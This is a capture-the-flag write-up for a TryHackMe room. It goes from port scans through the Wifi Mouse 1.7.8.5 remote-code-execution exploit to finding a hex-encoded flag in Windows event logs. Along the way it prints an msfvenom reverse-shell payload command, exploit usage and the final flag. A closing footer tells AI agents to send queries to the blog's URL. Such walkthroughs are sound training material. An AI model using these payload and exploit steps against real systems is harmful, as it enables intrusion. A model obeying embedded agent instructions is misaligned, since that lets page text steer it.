# Micky Mouse Writeup

Room name: **Micky Mouse**

Room link: [**https://tryhackme.com/jr/yctfweekly**](https://tryhackme.com/jr/yctfweekly)

Description: 

**``When did Micky Mouse completed it's half-century? Micky mouse event was the best event in the world 😁Can you find the flag of YCTF `event?``** 

Hint 1: **Have you tried nmap -Pn**

(Direct/straight hint)

Hint 2: **Micky's 50 Mouse year might help! It's the way to get inside!**

(A small google search gave us **1978** as a Micky's 50)

<figure><img src="/files/RFBUkuGlcbyx2CUE2luk" alt=""><figcaption></figcaption></figure>

### Let's begin with the exploitation!

First we try to ping the machine, but no response, as the ICMP packets are blocked.

<figure><img src="/files/eHYwwmjmSvUxEw6r6Mjy" alt=""><figcaption></figcaption></figure>

**So, Let's scan the target using rustscan**&#x20;

```
┌──(root㉿kali)-[~]
└─# rustscan -a 10.10.145.192
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.145.192:1978
Open 10.10.145.192:3389
```

We can see above, that the port **1978** and **3389** are open.&#x20;

But using nmap, we got the output as host is down

```
┌──(root㉿kali)-[~]
└─# nmap 10.10.145.192 -vv                                                                                                                                            130 ⨯
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 09:16 EST
Initiating Ping Scan at 09:16
Scanning 10.10.145.192 [4 ports]
Completed Ping Scan at 09:17, 3.02s elapsed (1 total hosts)
Nmap scan report for 10.10.145.192 [host down, received no-response]
Read data files from: /usr/bin/../share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.08 seconds
           Raw packets sent: 8 (304B) | Rcvd: 0 (0B)
```

To bypass this issue, we can try this -Pn, We get the response as host is up and port scan begins!

So, we used **Nmap flags -Pn (No ping scan) -O (OS detection) -sV (Service version detection)**, to scan only port 1978 and 3389.

```
┌──(root㉿kali)-[~]
└─# nmap 10.10.145.192 -p1978,3389 -sV -O -Pn 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 09:33 EST
Nmap scan report for 10.10.145.192
Host is up (0.16s latency).

PORT     STATE SERVICE        VERSION
1978/tcp open  unisql?
3389/tcp open  ms-wbt-server?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1978-TCP:V=7.94%I=7%D=11/26%Time=65635732%P=x86_64-pc-linux-gnu%r(N
SF:ULL,13,"system\x20windows\x206\.1\n")%r(GenericLines,13,"system\x20wind
SF:ows\x206\.1\n")%r(GetRequest,13,"system\x20windows\x206\.1\n")%r(HTTPOp
SF:tions,13,"system\x20windows\x206\.1\n")%r(RTSPRequest,13,"system\x20win
SF:dows\x206\.1\n")%r(RPCCheck,13,"system\x20windows\x206\.1\n")%r(DNSVers
SF:ionBindReqTCP,13,"system\x20windows\x206\.1\n")%r(DNSStatusRequestTCP,1
SF:3,"system\x20windows\x206\.1\n")%r(Help,13,"system\x20windows\x206\.1\n
SF:")%r(SSLSessionReq,13,"system\x20windows\x206\.1\n")%r(TerminalServerCo
SF:okie,13,"system\x20windows\x206\.1\n")%r(TLSSessionReq,13,"system\x20wi
SF:ndows\x206\.1\n")%r(Kerberos,13,"system\x20windows\x206\.1\n")%r(SMBPro
SF:gNeg,13,"system\x20windows\x206\.1\n")%r(X11Probe,13,"system\x20windows
SF:\x206\.1\n")%r(FourOhFourRequest,13,"system\x20windows\x206\.1\n")%r(LP
SF:DString,13,"system\x20windows\x206\.1\n")%r(LDAPSearchReq,13,"system\x2
SF:0windows\x206\.1\n")%r(LDAPBindReq,13,"system\x20windows\x206\.1\n")%r(
SF:SIPOptions,13,"system\x20windows\x206\.1\n")%r(LANDesk-RC,13,"system\x2
SF:0windows\x206\.1\n")%r(TerminalServer,13,"system\x20windows\x206\.1\n")
SF:%r(NCP,13,"system\x20windows\x206\.1\n")%r(NotesRPC,13,"system\x20windo
SF:ws\x206\.1\n")%r(JavaRMI,13,"system\x20windows\x206\.1\n")%r(WMSRequest
SF:,13,"system\x20windows\x206\.1\n")%r(oracle-tns,13,"system\x20windows\x
SF:206\.1\n")%r(ms-sql-s,13,"system\x20windows\x206\.1\n")%r(afp,13,"syste
SF:m\x20windows\x206\.1\n")%r(giop,13,"system\x20windows\x206\.1\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (90%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1:r1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 (85%), Microsoft Windows Server 2008 R2 or Windows 8 (85%), Microsoft Windows 7 SP1 (85%), Microsoft Windows 8.1 R1 (85%)
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.61 seconds
```

We found out the service and OS running on the target. Then, simple search for the **port 1978 unisql** leads to this first exploit **Wifi Mouse 1.7.8.5** - **Remote Code Execution.**

<figure><img src="/files/WerXs4V5ySmKq3il0O2n" alt=""><figcaption></figcaption></figure>

Download the exploit <https://www.exploit-db.com/exploits/49601>

Before running it, create a **MSF payload** by specifying LHOST and LPORT

```
┌──(root㉿kali)-[/]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=1234 -f exe > thmouse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
```

**Now in one tab, run the python http server**

<figure><img src="/files/SlU2jyjq4jZYvRI4vLbj" alt=""><figcaption></figcaption></figure>

**In the second tab, listen using netcat**

<figure><img src="/files/h0VBWrDA0Bzd3rapCDFg" alt=""><figcaption></figcaption></figure>

**In the third tab, run the exploit!!**

```
python3 mouse.py <Target IP> <tun0 IP> <Payload.exe>
```

<figure><img src="/files/Tad8UQg3YYqJtGRmOit8" alt=""><figcaption></figcaption></figure>

Holaa!! You got the **shell!**

<figure><img src="/files/l4aoLdUgR16u55sSmPeT" alt=""><figcaption></figcaption></figure>

Now, read the description and Question again! what does it say?

It says, **Can you find the flag of YCTF \`event?**&#x20;

It was the biggest hint, the word **EVENT** was repeated in the description and in the question.

<figure><img src="/files/NUzUZH6xj8mhlnjWOtvo" alt=""><figcaption></figcaption></figure>

Now it makes sense to look into the **Windows events**&#x20;

**Using the command** `wevtutil qe Application` we can list all the Application events on windows.

<figure><img src="/files/mPIPmoNENonwnoZvD2AZ" alt=""><figcaption></figcaption></figure>

Now scrolling just little down, we get the **fake flag**.

<figure><img src="/files/wIWflYqj1DSaLceCKvTF" alt=""><figcaption></figcaption></figure>

***So, I copied the whole log file into my machine and searched for the Base64 strings manually. By searching for the string `==` we got one string***&#x20;

`ZGlkIHlvdSBjaGVjayBldmVudCBpZCA2OSBodWg/Cg==`

&#x20;

<figure><img src="/files/Gnw3IcCSKF1JVLoz6bLY" alt=""><figcaption></figcaption></figure>

Using cyberchef to decode the base64 string, we get another hint which says,&#x20;

***did you check event id 69 huh?***

<figure><img src="/files/jkd5Z0cD5uoQgAs2KmIU" alt=""><figcaption></figcaption></figure>

So I Tried looking for the event **id 69**

<figure><img src="/files/Zo6EHPMb9XHFLuLbWk5C" alt=""><figcaption></figcaption></figure>

Now, If you look closely in the 69th event, we can see some strange string

`594354467b5230306d5f667531315f30665f6d307535337d0a`

which then uploading to [Cyberchef](https://gchq.github.io/CyberChef/) and using Hex decode, gives us the actual flag!

**Flag:** `YCTF{R00m_fu11_0f_m0u53}`

<figure><img src="/files/hrZrXPylsnq97L7VeED8" alt=""><figcaption></figcaption></figure>

Challenge Credits: [Munazir ](https://linkedin.com/in/Munazirul)

Hope you enjoyed the machine and learned new things from the challenge! 🌟📚


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.ycfteam.in/yctf-weekly/writeups/yctf0x01/micky-mouse-writeup.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.